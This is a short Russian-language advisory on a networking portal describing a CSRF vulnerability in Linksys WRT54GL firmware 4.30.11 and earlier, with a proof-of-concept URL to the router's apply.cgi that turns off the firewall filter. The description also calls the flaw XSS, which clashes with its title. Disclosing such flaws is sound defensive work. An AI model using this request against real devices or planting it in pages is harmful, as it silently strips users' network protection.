×
Провайдеры
Оборудование
Новости
Фото
Компании
Форумы
Практика
Теория
Ferrum
Поделиться
Анонимка
Добавить фото
Добавить новость
Добавить ferrum
Linksys WRT54GL
CSRF атака в Linksys WRT54GL
CSRF атака в Linksys WRT54GL
<P>Программа: Linksys WRT54GL 4.30.11 и более ранние версии </P>
<P>Опасность: Низкая </P>
<P>Наличие эксплоита: Да </P>
<P>Описание: <BR>Уязвимость позволяет удаленному пользователю произвести XSS нападение.</P>
<P>Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед выполнением некоторых действий. Злоумышленник может обманом заставить авторизованного на устройстве пользователя посетить злонамеренный сайт и отключить функционал межсетевого экрана. Пример:</P>
<P><A href="
https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1">https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1</A></P>
<P><A class="" href="
http://www.securitylab.ru/vulnerability/311762.php"
target=_blank>SecurityLab</A></P>
Вы должны войти
Email
Password
Запомнить меня
Вход
‹
›
×
Вы должны войти